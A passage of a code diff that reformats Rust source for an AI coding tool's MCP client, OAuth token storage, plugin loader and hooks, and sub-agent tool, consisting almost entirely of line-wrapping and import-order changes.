-                        result = format!("{}{}{}", &result[..start], replacement, &result[end + 1..]);
+                        result =
+                            format!("{}{}{}", &result[..start], replacement, &result[end + 1..]);
                         // Continue scanning from where the replacement ends
                         search_from = start + replacement.len();
                     }
@@ -295,13 +296,17 @@ pub mod types {
     #[derive(Debug, Clone, Serialize, Deserialize)]
     #[serde(tag = "type", rename_all = "lowercase")]
     pub enum McpContent {
-        Text { text: String },
+        Text {
+            text: String,
+        },
         Image {
             data: String,
             #[serde(rename = "mimeType")]
             mime_type: String,
         },
-        Resource { resource: ResourceContents },
+        Resource {
+            resource: ResourceContents,
+        },
     }
 
     #[derive(Debug, Clone, Serialize, Deserialize)]
@@ -427,10 +432,9 @@ pub mod transport {
 
     impl StdioTransport {
         pub async fn spawn(config: &McpServerConfig) -> anyhow::Result<Self> {
-            let command = config
-                .command
-                .as_deref()
-                .ok_or_else(|| anyhow::anyhow!("MCP server '{}' has no command configured", config.name))?;
+            let command = config.command.as_deref().ok_or_else(|| {
+                anyhow::anyhow!("MCP server '{}' has no command configured", config.name)
+            })?;
 
             let mut cmd = Command::new(command);
             cmd.args(&config.args)
@@ -448,14 +452,12 @@ pub mod transport {
                 )
             })?;
 
-            let stdin = child
-                .stdin
-                .take()
-                .ok_or_else(|| anyhow::anyhow!("MCP server '{}': could not capture stdin", config.name))?;
-            let stdout = child
-                .stdout
-                .take()
-                .ok_or_else(|| anyhow::anyhow!("MCP server '{}': could not capture stdout", config.name))?;
+            let stdin = child.stdin.take().ok_or_else(|| {
+                anyhow::anyhow!("MCP server '{}': could not capture stdin", config.name)
+            })?;
+            let stdout = child.stdout.take().ok_or_else(|| {
+                anyhow::anyhow!("MCP server '{}': could not capture stdout", config.name)
+            })?;
 
             let (tx, rx) = mpsc::unbounded_channel::<String>();
 
@@ -493,8 +495,9 @@ pub mod transport {
             let line = rx.recv().await;
             match line {
                 Some(s) => {
-                    let resp: JsonRpcResponse = serde_json::from_str(&s)
-                        .map_err(|e| anyhow::anyhow!("MCP response parse error: {} (raw: {})", e, s))?;
+                    let resp: JsonRpcResponse = serde_json::from_str(&s).map_err(|e| {
+                        anyhow::anyhow!("MCP response parse error: {} (raw: {})", e, s)
+                    })?;
                     Ok(Some(resp))
                 }
                 None => Ok(None),
@@ -511,8 +514,9 @@ pub mod transport {
             let mut rx = self.stdout_rx.lock().await;
             match rx.try_recv() {
                 Ok(line) => {
-                    let val: serde_json::Value = serde_json::from_str(&line)
-                        .map_err(|e| anyhow::anyhow!("MCP raw parse error: {} (raw: {})", e, line))?;
+                    let val: serde_json::Value = serde_json::from_str(&line).map_err(|e| {
+                        anyhow::anyhow!("MCP raw parse error: {} (raw: {})", e, line)
+                    })?;
                     Ok(Some(val))
                 }
                 Err(mpsc::error::TryRecvError::Empty) => Ok(None),
@@ -538,9 +542,10 @@ pub mod transport {
 
                     match line {
                         Some(s) => {
-                            let val: anyhow::Result<serde_json::Value> =
-                                serde_json::from_str(&s)
-                                    .map_err(|e| anyhow::anyhow!("MCP raw parse error: {} (raw: {})", e, s));
+                            let val: anyhow::Result<serde_json::Value> = serde_json::from_str(&s)
+                                .map_err(|e| {
+                                    anyhow::anyhow!("MCP raw parse error: {} (raw: {})", e, s)
+                                });
 
                             if tx.send(val).await.is_err() {
                                 // Receiver dropped; exit the polling task
@@ -610,7 +615,9 @@ pub mod client {
             let params = InitializeParams {
                 protocol_version: "2024-11-05".to_string(),
                 capabilities: ClientCapabilities {
-                    roots: Some(RootsCapability { list_changed: false }),
+                    roots: Some(RootsCapability {
+                        list_changed: false,
+                    }),
                     sampling: None,
                 },
                 client_info: ClientInfo {
@@ -622,7 +629,9 @@ pub mod client {
             let result: InitializeResult = self
                 .call("initialize", Some(serde_json::to_value(&params)?))
                 .await
-                .map_err(|e| anyhow::anyhow!("MCP server '{}' initialize failed: {}", self.server_name, e))?;
+                .map_err(|e| {
+                    anyhow::anyhow!("MCP server '{}' initialize failed: {}", self.server_name, e)
+                })?;
 
             self.server_info = Some(result.server_info);
             self.instructions = result.instructions;
@@ -644,7 +653,9 @@ pub mod client {
             if result.capabilities.resources.is_some() {
                 match self.list_resources().await {
                     Ok(resources) => self.resources = resources,
-                    Err(e) => warn!(server = %self.server_name, error = %e, "Failed to list resources"),
+                    Err(e) => {
+                        warn!(server = %self.server_name, error = %e, "Failed to list resources")
+                    }
                 }
             }
 
@@ -652,7 +663,9 @@ pub mod client {
             if result.capabilities.prompts.is_some() {
                 match self.list_prompts().await {
                     Ok(prompts) => self.prompts = prompts,
-                    Err(e) => warn!(server = %self.server_name, error = %e, "Failed to list prompts"),
+                    Err(e) => {
+                        warn!(server = %self.server_name, error = %e, "Failed to list prompts")
+                    }
                 }
             }
 
@@ -932,17 +945,22 @@ pub mod client {
             self.transport.send(&req).await?;
 
             loop {
-                let resp = self
-                    .transport
-                    .recv()
-                    .await?
-                    .ok_or_else(|| anyhow::anyhow!("MCP transport closed while waiting for response to '{}'", method))?;
+                let resp = self.transport.recv().await?.ok_or_else(|| {
+                    anyhow::anyhow!(
+                        "MCP transport closed while waiting for response to '{}'",
+                        method
+                    )
+                })?;
 
                 // Check if this response matches our request id
                 let resp_id = resp.id.as_ref().and_then(|v| v.as_u64()).unwrap_or(0);
                 if resp_id != id {
                     // Might be a server-initiated notification; skip
-                    debug!(got_id = resp_id, want_id = id, "Skipping non-matching response");
+                    debug!(
+                        got_id = resp_id,
+                        want_id = id,
+                        "Skipping non-matching response"
+                    );
                     continue;
                 }
 
@@ -997,7 +1015,9 @@ pub enum McpAuthState {
     /// OAuth required; `auth_url` is where the user should go.
     Required { auth_url: String },
     /// Successfully authenticated; token may have an expiry.
-    Authenticated { token_expiry: Option<chrono::DateTime<chrono::Utc>> },
+    Authenticated {
+        token_expiry: Option<chrono::DateTime<chrono::Utc>>,
+    },
     /// An error occurred reading / initiating auth.
     Error(String),
 }
@@ -1014,7 +1034,8 @@ pub struct McpManager {
     /// Original (unexpanded) server configs — needed for OAuth initiation.
     server_configs: HashMap<String, McpServerConfig>,
     /// Active resource subscriptions: (server_name, uri) → change event sender.
-    pub resource_subscriptions: DashMap<(String, String), tokio::sync::mpsc::Sender<ResourceChangedEvent>>,
+    pub resource_subscriptions:
+        DashMap<(String, String), tokio::sync::mpsc::Sender<ResourceChangedEvent>>,
 }
 
 #[derive(Debug, Clone)]
@@ -1046,7 +1067,9 @@ impl McpManager {
         let mut manager = Self::new();
         for config in configs {
             // Store original config for later OAuth use
-            manager.server_configs.insert(config.name.clone(), config.clone());
+            manager
+                .server_configs
+                .insert(config.name.clone(), config.clone());
             // Expand env vars before using the config
             let expanded = expand_server_config(config);
 
@@ -1065,7 +1088,9 @@ impl McpManager {
                                 resources = client.resources.len(),
                                 "MCP server connected"
                             );
-                            manager.clients.insert(expanded.name.clone(), Arc::new(client));
+                            manager
+                                .clients
+                                .insert(expanded.name.clone(), Arc::new(client));
                         }
                         Err(e) => {
                             error!(
@@ -1211,16 +1236,16 @@ impl McpManager {
         self.clients
             .iter()
             .filter_map(|(name, client)| {
-                client.instructions.as_ref().map(|instr| (name.clone(), instr.clone()))
+                client
+                    .instructions
+                    .as_ref()
+                    .map(|instr| (name.clone(), instr.clone()))
             })
             .collect()
     }
 
     /// List all resources from all (or a specific) connected server.
-    pub async fn list_all_resources(
-        &self,
-        server_filter: Option<&str>,
-    ) -> Vec<serde_json::Value> {
+    pub async fn list_all_resources(&self, server_filter: Option<&str>) -> Vec<serde_json::Value> {
         let mut all = vec![];
         for (name, client) in &self.clients {
             if let Some(filter) = server_filter {
@@ -1254,20 +1279,16 @@ impl McpManager {
         server_name: &str,
         uri: &str,
     ) -> anyhow::Result<serde_json::Value> {
-        let client = self
-            .clients
-            .get(server_name)
-            .ok_or_else(|| anyhow::anyhow!("MCP server '{}' not found or not connected", server_name))?;
+        let client = self.clients.get(server_name).ok_or_else(|| {
+            anyhow::anyhow!("MCP server '{}' not found or not connected", server_name)
+        })?;
 
         let contents = client.read_resource(uri).await?;
         Ok(serde_json::to_value(&contents)?)
     }
 
     /// List all prompts from all (or a specific) connected server.
-    pub async fn list_all_prompts(
-        &self,
-        server_filter: Option<&str>,
-    ) -> Vec<serde_json::Value> {
+    pub async fn list_all_prompts(&self, server_filter: Option<&str>) -> Vec<serde_json::Value> {
         let mut all = vec![];
         for (name, client) in &self.clients {
             if let Some(filter) = server_filter {
@@ -1304,10 +1325,9 @@ impl McpManager {
         prompt_name: &str,
         arguments: Option<std::collections::HashMap<String, String>>,
     ) -> anyhow::Result<GetPromptResult> {
-        let client = self
-            .clients
-            .get(server_name)
-            .ok_or_else(|| anyhow::anyhow!("MCP server '{}' not found or not connected", server_name))?;
+        let client = self.clients.get(server_name).ok_or_else(|| {
+            anyhow::anyhow!("MCP server '{}' not found or not connected", server_name)
+        })?;
         client.get_prompt(prompt_name, arguments).await
     }
 
@@ -1649,7 +1669,10 @@ mod tests {
         let expanded = expand_server_config(&cfg);
         assert_eq!(expanded.command.as_deref(), Some("/home/user/bin/server"));
         assert_eq!(expanded.args[1], "/home/user");
-        assert_eq!(expanded.env.get("PATH").map(|s| s.as_str()), Some("/home/user/bin"));
+        assert_eq!(
+            expanded.env.get("PATH").map(|s| s.as_str()),
+            Some("/home/user/bin")
+        );
         std::env::remove_var("_CC_TEST_HOME");
     }
 
@@ -1829,7 +1852,10 @@ pub async fn subscribe_resource(
     };
 
     let params = serde_json::json!({ "uri": uri });
-    if let Err(e) = client.call::<serde_json::Value>("resources/subscribe", Some(params)).await {
+    if let Err(e) = client
+        .call::<serde_json::Value>("resources/subscribe", Some(params))
+        .await
+    {
         tracing::warn!(server_name, uri, error = %e, "subscribe_resource RPC failed");
         return make_dead();
     }
@@ -1852,10 +1878,12 @@ pub async fn unsubscribe_resource(
     server_name: &str,
     uri: &str,
 ) -> Result<(), String> {
-    let client = manager
-        .clients
-        .get(server_name)
-        .ok_or_else(|| format!("unsubscribe_resource: server '{}' not connected", server_name))?;
+    let client = manager.clients.get(server_name).ok_or_else(|| {
+        format!(
+            "unsubscribe_resource: server '{}' not connected",
+            server_name
+        )
+    })?;
 
     let params = serde_json::json!({ "uri": uri });
     client
@@ -1881,9 +1909,7 @@ mod notification_tests {
     impl MockTransport {
         fn with_lines(lines: &[&str]) -> Arc<Self> {
             Arc::new(Self {
-                queue: tokio::sync::Mutex::new(
-                    lines.iter().map(|s| s.to_string()).collect(),
-                ),
+                queue: tokio::sync::Mutex::new(lines.iter().map(|s| s.to_string()).collect()),
             })
         }
     }
@@ -1937,7 +1963,9 @@ mod notification_tests {
                     match line {
                         Some(s) => {
                             let val: anyhow::Result<serde_json::Value> = serde_json::from_str(&s)
-                                .map_err(|e| anyhow::anyhow!("Mock parse error: {} (raw: {})", e, s));
+                                .map_err(|e| {
+                                    anyhow::anyhow!("Mock parse error: {} (raw: {})", e, s)
+                                });
 
                             if tx.send(val).await.is_err() {
                                 break;
@@ -1981,7 +2009,10 @@ mod notification_tests {
         let event = rx.try_recv().expect("expected a ResourceChangedEvent");
         assert_eq!(event.server_name, "myserver");
         assert_eq!(event.uri, "file:///foo.txt");
-        assert!(rx.try_recv().is_err(), "channel should be empty after one event");
+        assert!(
+            rx.try_recv().is_err(),
+            "channel should be empty after one event"
+        );
     }
 
     #[tokio::test]
@@ -2027,10 +2058,7 @@ mod notification_tests {
 
     #[tokio::test]
     async fn test_poll_notifications_empty_queue_is_noop() {
-        let client = client::McpClient::new_for_test(
-            "myserver",
-            MockTransport::with_lines(&[]),
-        );
+        let client = client::McpClient::new_for_test("myserver", MockTransport::with_lines(&[]));
         let subscriptions: DashMap<
             (String, String),
             tokio::sync::mpsc::Sender<ResourceChangedEvent>,
@@ -2054,10 +2082,7 @@ mod notification_tests {
         })
         .to_string();
 
-        let client = client::McpClient::new_for_test(
-            "s1",
-            MockTransport::with_lines(&[&n1, &n2]),
-        );
+        let client = client::McpClient::new_for_test("s1", MockTransport::with_lines(&[&n1, &n2]));
 
         let subscriptions: DashMap<
             (String, String),
@@ -2089,10 +2114,8 @@ mod notification_tests {
         })
         .to_string();
 
-        let client = client::McpClient::new_for_test(
-            "myserver",
-            MockTransport::with_lines(&[&response]),
-        );
+        let client =
+            client::McpClient::new_for_test("myserver", MockTransport::with_lines(&[&response]));
 
         let subscriptions: DashMap<
             (String, String),

--- a/src-rust/crates/mcp/src/oauth.rs
+++ b/src-rust/crates/mcp/src/oauth.rs
@@ -22,7 +22,9 @@ pub struct McpToken {
 impl McpToken {
     /// Returns `true` if the token is expired or will expire within `grace_secs`.
     pub fn is_expired(&self, grace_secs: u64) -> bool {
-        let Some(exp) = self.expires_at else { return false };
+        let Some(exp) = self.expires_at else {
+            return false;
+        };
         let now = std::time::SystemTime::now()
             .duration_since(std::time::UNIX_EPOCH)
             .unwrap_or_default()
@@ -60,7 +62,11 @@ pub fn get_mcp_token(server_name: &str) -> Option<McpToken> {
 /// Delete the stored token for a server (effectively logs out).
 pub fn remove_mcp_token(server_name: &str) -> std::io::Result<()> {
     let path = token_path(server_name);
-    if path.exists() { std::fs::remove_file(&path) } else { Ok(()) }
+    if path.exists() {
+        std::fs::remove_file(&path)
+    } else {
+        Ok(())
+    }
 }
 
 // ---------------------------------------------------------------------------
@@ -114,10 +120,7 @@ pub struct XaaLoginState {
 ///
 /// Opens the browser to the IdP authorization URL with PKCE parameters.
 /// Returns the login state needed to complete the exchange.
-pub fn initiate_xaa_login(
-    server_name: &str,
-    idp_url: &str,
-) -> std::io::Result<XaaLoginState> {
+pub fn initiate_xaa_login(server_name: &str, idp_url: &str) -> std::io::Result<XaaLoginState> {
     let port = oauth_port_alloc()?;
     let verifier = pkce_verifier();
     let challenge = pkce_challenge(&verifier);
@@ -194,7 +197,10 @@ pub async fn exchange_code(
         scope: Option<String>,
     }
 
-    let tr: TokenResponse = resp.json().await.map_err(|e| anyhow::anyhow!("exchange_code: bad JSON: {}", e))?;
+    let tr: TokenResponse = resp
+        .json()
+        .await
+        .map_err(|e| anyhow::anyhow!("exchange_code: bad JSON: {}", e))?;
 
     let expires_at = tr.expires_in.map(|secs| {
         std::time::SystemTime::now()
@@ -214,7 +220,10 @@ pub async fn exchange_code(
 }
 
 /// Refresh an existing MCP token using the stored refresh token.
-pub async fn refresh_mcp_token(server_name: &str, token_endpoint: &str) -> anyhow::Result<McpToken> {
+pub async fn refresh_mcp_token(
+    server_name: &str,
+    token_endpoint: &str,
+) -> anyhow::Result<McpToken> {
     let existing = get_mcp_token(server_name)
         .ok_or_else(|| anyhow::anyhow!("No stored token for {}", server_name))?;
     let refresh = existing
@@ -224,7 +233,10 @@ pub async fn refresh_mcp_token(server_name: &str, token_endpoint: &str) -> anyho
         .to_string();
 
     let client = reqwest::Client::new();
-    let params = [("grant_type", "refresh_token"), ("refresh_token", refresh.as_str())];
+    let params = [
+        ("grant_type", "refresh_token"),
+        ("refresh_token", refresh.as_str()),
+    ];
 
     let resp = client
         .post(token_endpoint)

--- a/src-rust/crates/mcp/src/registry.rs
+++ b/src-rust/crates/mcp/src/registry.rs
@@ -91,7 +91,8 @@ pub const OFFICIAL_SERVERS: &[OfficialMcpServer] = &[
     OfficialMcpServer {
         name: "sequential-thinking",
         description: "Structured chain-of-thought reasoning tool.",
-        homepage: "https://github.com/modelcontextprotocol/servers/tree/main/src/sequentialthinking",
+        homepage:
+            "https://github.com/modelcontextprotocol/servers/tree/main/src/sequentialthinking",
         install_command: Some("npx -y @modelcontextprotocol/server-sequential-thinking"),
         categories: &["reasoning"],
     },
@@ -119,7 +120,8 @@ pub const OFFICIAL_SERVERS: &[OfficialMcpServer] = &[
     OfficialMcpServer {
         name: "aws-kb-retrieval",
         description: "Retrieve knowledge from AWS Bedrock Knowledge Bases.",
-        homepage: "https://github.com/modelcontextprotocol/servers/tree/main/src/aws-kb-retrieval-server",
+        homepage:
+            "https://github.com/modelcontextprotocol/servers/tree/main/src/aws-kb-retrieval-server",
         install_command: Some("npx -y @modelcontextprotocol/server-aws-kb-retrieval"),
         categories: &["aws", "remote"],
     },

--- a/src-rust/crates/plugins/src/hooks.rs
+++ b/src-rust/crates/plugins/src/hooks.rs
@@ -82,7 +82,10 @@ pub fn parse_hooks_value(value: &serde_json::Value) -> Option<PluginHooksConfig>
             .and_then(|d| d.as_str())
             .map(String::from);
         let events = parse_hooks_events_map(inner)?;
-        return Some(PluginHooksConfig { description, events });
+        return Some(PluginHooksConfig {
+            description,
+            events,
+        });
     }
 
     // Fall back: the whole value is the events map.
@@ -273,9 +276,8 @@ pub async fn dispatch_post_tool_hooks(
         let tn = tool_name.clone();
         let ti = tool_input.clone();
         let tr = tool_result.clone();
-        let task = tokio::task::spawn_blocking(move || {
-            run_post_tool_hook(&hook.command, &tn, &ti, &tr)
-        });
+        let task =
+            tokio::task::spawn_blocking(move || run_post_tool_hook(&hook.command, &tn, &ti, &tr));
         tasks.push(task);
     }
 

--- a/src-rust/crates/plugins/src/lib.rs
+++ b/src-rust/crates/plugins/src/lib.rs
@@ -14,7 +14,7 @@ pub mod plugin;
 pub mod registry;
 
 // Re-export the most commonly used items at the crate root.
-pub use hooks::{HookOutcome, HookRegistry, RegisteredHook, register_plugin_hooks};
+pub use hooks::{register_plugin_hooks, HookOutcome, HookRegistry, RegisteredHook};
 pub use loader::{default_user_plugins_dir, discover_plugins, project_plugins_dir};
 pub use manifest::{
     HookEventKind, PluginAuthor, PluginHookEntry, PluginHookMatcher, PluginHooksConfig,
@@ -227,8 +227,11 @@ pub async fn load_plugins(
 
     // Extra paths.
     for path in extra_paths {
-        let (plugins, errors) =
-            discover_plugins(&[path.clone()], PluginSource::Extra(path.to_string_lossy().into_owned())).await;
+        let (plugins, errors) = discover_plugins(
+            &[path.clone()],
+            PluginSource::Extra(path.to_string_lossy().into_owned()),
+        )
+        .await;
         registry.extend(plugins, errors);
     }
 
@@ -281,18 +284,14 @@ pub fn parse_plugin_args(args: &str) -> PluginSubCommand {
     let parts: Vec<&str> = args.splitn(3, char::is_whitespace).collect();
     match parts.first().map(|s| s.to_lowercase()).as_deref() {
         Some("list") | Some("ls") => PluginSubCommand::List,
-        Some("enable") => PluginSubCommand::Enable(
-            parts.get(1).unwrap_or(&"").to_string(),
-        ),
-        Some("disable") => PluginSubCommand::Disable(
-            parts.get(1).unwrap_or(&"").to_string(),
-        ),
-        Some("info") | Some("show") => PluginSubCommand::Info(
-            parts.get(1).unwrap_or(&"").to_string(),
-        ),
-        Some("install") | Some("i") => PluginSubCommand::Install(
-            parts.get(1).unwrap_or(&"").to_string(),
-        ),
+        Some("enable") => PluginSubCommand::Enable(parts.get(1).unwrap_or(&"").to_string()),
+        Some("disable") => PluginSubCommand::Disable(parts.get(1).unwrap_or(&"").to_string()),
+        Some("info") | Some("show") => {
+            PluginSubCommand::Info(parts.get(1).unwrap_or(&"").to_string())
+        }
+        Some("install") | Some("i") => {
+            PluginSubCommand::Install(parts.get(1).unwrap_or(&"").to_string())
+        }
         Some("reload") | Some("refresh") => PluginSubCommand::Reload,
         Some("help") | Some("--help") | Some("-h") => PluginSubCommand::Help,
         _ => PluginSubCommand::Help,
@@ -338,10 +337,18 @@ pub fn format_plugin_list(registry: &PluginRegistry) -> String {
         }
         let mut extras: Vec<String> = Vec::new();
         if cmd_count > 0 {
-            extras.push(format!("{} cmd{}", cmd_count, if cmd_count == 1 { "" } else { "s" }));
+            extras.push(format!(
+                "{} cmd{}",
+                cmd_count,
+                if cmd_count == 1 { "" } else { "s" }
+            ));
         }
         if hook_count > 0 {
-            extras.push(format!("{} hook{}", hook_count, if hook_count == 1 { "" } else { "s" }));
+            extras.push(format!(
+                "{} hook{}",
+                hook_count,
+                if hook_count == 1 { "" } else { "s" }
+            ));
         }
         if !extras.is_empty() {
             out.push_str(&format!(" ({})", extras.join(", ")));
@@ -363,7 +370,10 @@ pub fn format_plugin_list(registry: &PluginRegistry) -> String {
 /// Build the text output for `/plugin info <name>`.
 pub fn format_plugin_info(registry: &PluginRegistry, name: &str) -> String {
     match registry.get(name) {
-        None => format!("Plugin '{}' not found. Use `/plugin list` to see installed plugins.", name),
+        None => format!(
+            "Plugin '{}' not found. Use `/plugin list` to see installed plugins.",
+            name
+        ),
         Some(p) => {
             let mut out = String::new();
             out.push_str(&format!("Plugin: {}\n", p.name));
@@ -378,7 +388,11 @@ pub fn format_plugin_info(registry: &PluginRegistry, name: &str) -> String {
             }
             out.push_str(&format!(
                 "Status: {}\n",
-                if registry.is_enabled(name) { "enabled" } else { "disabled" }
+                if registry.is_enabled(name) {
+                    "enabled"
+                } else {
+                    "disabled"
+                }
             ));
             out.push_str(&format!("Source: {}\n", p.source_id));
             out.push_str(&format!("Path: {}\n", p.path.display()));
@@ -401,7 +415,10 @@ pub fn format_plugin_info(registry: &PluginRegistry, name: &str) -> String {
                         for matcher in matchers {
                             for hook in &matcher.hooks {
                                 let blocking = if hook.blocking { " [blocking]" } else { "" };
-                                out.push_str(&format!("  {} {}{}\n", event, hook.command, blocking));
+                                out.push_str(&format!(
+                                    "  {} {}{}\n",
+                                    event, hook.command, blocking
+                                ));
                             }
                         }
                     }
@@ -410,7 +427,10 @@ pub fn format_plugin_info(registry: &PluginRegistry, name: &str) -> String {
 
             // MCP servers.
             if !p.manifest.mcp_servers.is_empty() {
-                out.push_str(&format!("\nMCP servers ({}):\n", p.manifest.mcp_servers.len()));
+                out.push_str(&format!(
+                    "\nMCP servers ({}):\n",
+                    p.manifest.mcp_servers.len()
+                ));
                 for srv in &p.manifest.mcp_servers {
                     out.push_str(&format!("  {}\n", srv.name));
                 }
@@ -418,7 +438,10 @@ pub fn format_plugin_info(registry: &PluginRegistry, name: &str) -> String {
 
             // LSP servers.
             if !p.manifest.lsp_servers.is_empty() {
-                out.push_str(&format!("\nLSP servers ({}):\n", p.manifest.lsp_servers.len()));
+                out.push_str(&format!(
+                    "\nLSP servers ({}):\n",
+                    p.manifest.lsp_servers.len()
+                ));
                 for srv in &p.manifest.lsp_servers {
                     out.push_str(&format!("  {}\n", srv.name));
                 }
@@ -433,9 +456,7 @@ pub fn format_plugin_info(registry: &PluginRegistry, name: &str) -> String {
 ///
 /// Copies the plugin directory into `~/.claurst/plugins/` and returns the
 /// loaded plugin name on success.
-pub fn install_plugin_from_path(
-    source_path: &Path,
-) -> Result<String, PluginError> {
+pub fn install_plugin_from_path(source_path: &Path) -> Result<String, PluginError> {
     // Validate that the source looks like a plugin directory.
     if !source_path.exists() {
         return Err(PluginError::Io {
@@ -460,7 +481,11 @@ pub fn install_plugin_from_path(
         message: e.to_string(),
     })?;
 
-    let manifest = if manifest_path.extension().map(|e| e == "toml").unwrap_or(false) {
+    let manifest = if manifest_path
+        .extension()
+        .map(|e| e == "toml")
+        .unwrap_or(false)
+    {
         PluginManifest::from_toml(&bytes)
     } else {
         PluginManifest::from_json(&bytes)
@@ -520,10 +545,7 @@ fn copy_dir_all(src: &Path, dst: &Path) -> std::io::Result<()> {
 
 /// Format the result of a plugin reload into a human-readable string,
 /// suitable for the `/reload-plugins` command output.
-pub fn format_reload_summary(
-    registry: &PluginRegistry,
-    diff: &ReloadDiff,
-) -> String {
+pub fn format_reload_summary(registry: &PluginRegistry, diff: &ReloadDiff) -> String {
     let enabled = registry.enabled_count();
     let total = registry.plugin_count();
 
@@ -542,7 +564,11 @@ pub fn format_reload_summary(
         if cmd_count == 1 { "" } else { "s" }
     ));
 
-    let hook_count: usize = registry.build_hook_registry().values().map(|v| v.len()).sum();
+    let hook_count: usize = registry
+        .build_hook_registry()
+        .values()
+        .map(|v| v.len())
+        .sum();
     parts.push(format!(
         "{} hook{}",
         hook_count,
@@ -632,7 +658,11 @@ mod tests {
     #[tokio::test]
     async fn load_plugins_finds_project_plugin() {
         let tmp = TempDir::new().unwrap();
-        let plugin_dir = tmp.path().join(".claurst").join("plugins").join("test-plugin");
+        let plugin_dir = tmp
+            .path()
+            .join(".claurst")
+            .join("plugins")
+            .join("test-plugin");
         std::fs::create_dir_all(&plugin_dir).unwrap();
         write_manifest(
             &plugin_dir,

--- a/src-rust/crates/plugins/src/loader.rs
+++ b/src-rust/crates/plugins/src/loader.rs
@@ -113,19 +113,35 @@ pub fn try_load_from_path(
     // Resolve sub-paths.
     let commands_path = {
         let p = plugin_dir.join("commands");
-        if p.is_dir() { Some(p) } else { None }
+        if p.is_dir() {
+            Some(p)
+        } else {
+            None
+        }
     };
     let agents_path = {
         let p = plugin_dir.join("agents");
-        if p.is_dir() { Some(p) } else { None }
+        if p.is_dir() {
+            Some(p)
+        } else {
+            None
+        }
     };
     let skills_path = {
         let p = plugin_dir.join("skills");
-        if p.is_dir() { Some(p) } else { None }
+        if p.is_dir() {
+            Some(p)
+        } else {
+            None
+        }
     };
     let output_styles_path = {
         let p = plugin_dir.join("output-styles");
-        if p.is_dir() { Some(p) } else { None }
+        if p.is_dir() {
+            Some(p)
+        } else {
+            None
+        }
     };
 
     // Load hooks config (hooks/hooks.json takes priority over inline manifest field).
@@ -314,10 +330,7 @@ fn collect_markdown_commands(
 ///
 /// e.g. `<plugin_dir>/commands/build/deploy.md` → `myplugin:build:deploy`
 fn command_name_from_file(path: &Path, plugin_name: &str) -> String {
-    let stem = path
-        .file_stem()
-        .and_then(|s| s.to_str())
-        .unwrap_or("cmd");
+    let stem = path.file_stem().and_then(|s| s.to_str()).unwrap_or("cmd");
     format!("{}:{}", plugin_name, stem)
 }
 

--- a/src-rust/crates/plugins/src/manifest.rs
+++ b/src-rust/crates/plugins/src/manifest.rs
@@ -377,10 +377,7 @@ fn normalize_manifest_json(mut v: serde_json::Value) -> serde_json::Value {
                     entry
                 })
                 .collect();
-            obj.insert(
-                "mcp_servers".to_string(),
-                serde_json::Value::Array(arr),
-            );
+            obj.insert("mcp_servers".to_string(), serde_json::Value::Array(arr));
         } else if mcp.is_array() {
             obj.insert("mcp_servers".to_string(), mcp);
         }
@@ -401,10 +398,7 @@ fn normalize_manifest_json(mut v: serde_json::Value) -> serde_json::Value {
                     entry
                 })
                 .collect();
-            obj.insert(
-                "lsp_servers".to_string(),
-                serde_json::Value::Array(arr),
-            );
+            obj.insert("lsp_servers".to_string(), serde_json::Value::Array(arr));
         } else if lsp.is_array() {
             obj.insert("lsp_servers".to_string(), lsp);
         }

--- a/src-rust/crates/plugins/src/marketplace.rs
+++ b/src-rust/crates/plugins/src/marketplace.rs
@@ -230,8 +230,8 @@ pub fn list_installed() -> Vec<InstalledPlugin> {
 
             let (version, description) = if yaml_path.exists() {
                 let content = std::fs::read_to_string(&yaml_path).unwrap_or_default();
-                let version = extract_yaml_str(&content, "version")
-                    .unwrap_or_else(|| "0.0.0".to_string());
+                let version =
+                    extract_yaml_str(&content, "version").unwrap_or_else(|| "0.0.0".to_string());
                 let description = extract_yaml_str(&content, "description").unwrap_or_default();
                 (version, description)
             } else if json_path.exists() {
@@ -278,12 +278,7 @@ fn plugin_install_dir(name: &str) -> std::path::PathBuf {
 fn extract_yaml_str(content: &str, key: &str) -> Option<String> {
     for line in content.lines() {
         if let Some(rest) = line.strip_prefix(&format!("{key}:")) {
-            return Some(
-                rest.trim()
-                    .trim_matches('"')
-                    .trim_matches('\'')
-                    .to_string(),
-            );
+            return Some(rest.trim().trim_matches('"').trim_matches('\'').to_string());
         }
     }
     None

--- a/src-rust/crates/plugins/src/registry.rs
+++ b/src-rust/crates/plugins/src/registry.rs
@@ -2,7 +2,7 @@
 ///
 /// Ported from the TS "enabled plugins" concept in `pluginLoader.ts` and the
 /// app-state plugin arrays.
-use crate::hooks::{HookRegistry, register_plugin_hooks};
+use crate::hooks::{register_plugin_hooks, HookRegistry};
 use crate::plugin::{LoadedPlugin, PluginCommandDef, PluginError, ReloadDiff};
 use std::collections::HashMap;
 
@@ -274,8 +274,8 @@ impl PluginRegistry {
 #[cfg(test)]
 mod tests {
     use super::*;
-    use crate::plugin::PluginSource;
     use crate::manifest::PluginManifest;
+    use crate::plugin::PluginSource;
     use std::path::PathBuf;
 
     fn make_plugin(name: &str) -> LoadedPlugin {

--- a/src-rust/crates/query/src/agent_tool.rs
+++ b/src-rust/crates/query/src/agent_tool.rs
@@ -282,10 +282,8 @@ impl Tool for AgentTool {
                             let p = entry.path();
                             if p.extension().map_or(false, |e| e == "md") {
                                 if let Ok(content) = std::fs::read_to_string(&p) {
-                                    let name = p
-                                        .file_stem()
-                                        .and_then(|s| s.to_str())
-                                        .unwrap_or("agent");
+                                    let name =
+                                        p.file_stem().and_then(|s| s.to_str()).unwrap_or("agent");
                                     agent_defs.push_str(&format!(
                                         "\n\n## Agent: {}\n{}",
                                         name,
@@ -456,25 +454,21 @@ impl Tool for AgentTool {
                 );
                 ToolResult::success(text)
             }
-            QueryOutcome::MaxTokens { partial_message, .. } => {
+            QueryOutcome::MaxTokens {
+                partial_message, ..
+            } => {
                 let text = partial_message.get_all_text();
-                ToolResult::success(format!(
-                    "{}\n\n[Note: Agent hit max_tokens limit]",
-                    text
-                ))
+                ToolResult::success(format!("{}\n\n[Note: Agent hit max_tokens limit]", text))
             }
-            QueryOutcome::Cancelled => {
-                ToolResult::error("Sub-agent was cancelled".to_string())
-            }
-            QueryOutcome::Error(e) => {
-                ToolResult::error(format!("Sub-agent error: {}", e))
-            }
-            QueryOutcome::BudgetExceeded { cost_usd, limit_usd } => {
-                ToolResult::error(format!(
-                    "Sub-agent stopped: budget ${:.4} exceeded (limit ${:.4})",
-                    cost_usd, limit_usd
-                ))
-            }
+            QueryOutcome::Cancelled => ToolResult::error("Sub-agent was cancelled".to_string()),
+            QueryOutcome::Error(e) => ToolResult::error(format!("Sub-agent error: {}", e)),
+            QueryOutcome::BudgetExceeded {
+                cost_usd,
+                limit_usd,
+            } => ToolResult::error(format!(
